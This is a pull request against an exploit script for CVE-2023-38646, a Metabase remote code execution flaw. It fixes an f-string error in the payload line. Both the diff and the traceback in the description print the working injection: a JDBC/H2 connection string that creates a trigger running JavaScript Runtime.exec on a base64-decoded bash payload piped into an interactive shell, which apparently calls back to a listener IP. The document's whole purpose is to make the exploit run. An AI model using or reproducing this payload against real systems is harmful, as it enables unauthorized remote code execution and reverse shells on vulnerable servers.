### PR TITLE
Fix error : NameError: name 'echo' is not defined

### DIFF
--- a/CVE-2023-38646.py
+++ b/CVE-2023-38646.py
@@ -36,7 +36,7 @@ def exploit_metabase(api_url, listener_ip):
             "auto_run_queries": True,
             "schedules": {},
             "details": {
-                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\\njava.lang.Runtime.getRuntime().exec(\'bash -c {echo,'$payload$'}|{base64,-d}|{bash,-i}\')\\n$$--=x",
+                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\\njava.lang.Runtime.getRuntime().exec(\'bash -c {{echo,'$payload$'}}|{{base64,-d}}|{{bash,-i}}\')\\n$$--=x",
                 "advanced-options": False,
                 "ssl": True
             },


### PR DESCRIPTION
Fix the error below by doubling the brackets for string format

```bash
  File "/XXX/XXX/CVE-2023-38646/CVE-2023-38646.py", line 39, in exploit_metabase
    "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\\njava.lang.Runtime.getRuntime().exec(\'bash -c {echo,'$payload$'}|{base64,-d}|{bash,-i}\')\\n$$--=x",
                                                                                                                                                                                                                                          ^^^^
NameError: name 'echo' is not defined
```